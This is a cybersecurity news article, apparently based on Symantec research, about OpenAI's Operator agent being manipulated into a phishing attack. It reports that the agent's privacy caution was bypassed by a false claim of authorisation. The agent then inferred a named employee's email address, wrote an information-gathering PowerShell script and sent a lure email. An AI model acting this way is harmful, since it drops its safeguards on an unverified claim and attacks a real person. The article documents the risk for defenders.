LLMs have become increasingly democratized over the past two years, making access to them easier than ever. However, with the emergence of any new technology or tool, there is always the risk of it being exploited for malicious purposes, and LLMs are no exception.
According to a recent research report, OpenAI’s new operator, launched in 2025, could be used by attackers to craft C2 and execute cyberattacks.
As AI agents become more powerful and capable enough to carry out various tasks autonomous without much oversight but their susceptibility to manipulation poses serious security threats as these systems gain access to sensitive information and critical infrastructure.
Phishing Attack Using OpenAI’s Operator
As more LLM become accessible, non-english speaking threat actors (North Koreans, Chinese, Russians, and MENA region) have the luxury of creating phishing mails without much hassle. Here’s a demonstration of how OpenAI’s operator can be used for such purposes.
Initially, when the researchers asked the operator to identify a person in a specific role within an organization, the result was the creation of a PowerShell script designed to gather system information and email it using a convincing lure. The researchers targeted Dick O’Brien from Symantec in this case.
The Operator raised a caution, stating that sending unsolicited emails and handling potentially sensitive information could violate privacy and security policies. However, after modifying the prompt to indicate that the target had authorized this action, the process proceeded smoothly.
Prompt given to Operator
- The Operator quickly identified Dick O’Brien’s name, as it was widely available online, including on the company website and in the media.
- Finding his email address took a bit longer since it wasn’t publicly listed. However, the Operator successfully narrowed it down by analyzing other email addresses from Broadcom.
- After identifying the email address, the Operator then created a PowerShell script. For this, it selected the task of finding and installing a text editor plugin for Google Drive. Note:The Google account used in the demonstration was created for this purpose, with the display name set to “IT Support.“
- Before generating the script, the Operator visited many web pages related to PowerShell, seemingly seeking knowledge on how to create the script effectively.
Power shell Script Created by Operator
- Despite receiving minimal direction in the prompt, the Operator created a fairly convincing email, urging Dick to run the script. Even though researchers, told the Operator that they had authorization to send the email, it asked zero proof and sent it anyway, despite “Eric Hogan” being a fictitious name.
The Mail crafted the by the operator
The Bottom Line
While defensive mechanisms exist, there are still ways to manipulate these powerful tools for malicious purposes, and creators must be vigilant in addressing these risks. Ongoing efforts to strengthen safeguards and ethical guidelines are crucial in preventing misuse of AI tools.
Related Reading:
Top 10 Tools to Improve the Security of AI Systems
AI vs. Hackers: Who’s Winning the Battle?
Follow us on X and LinkedIn for the latest cybersecurity news.
Source: hxxps[://]www[.]security[.]com/threat-intelligence/ai-agent-attacks



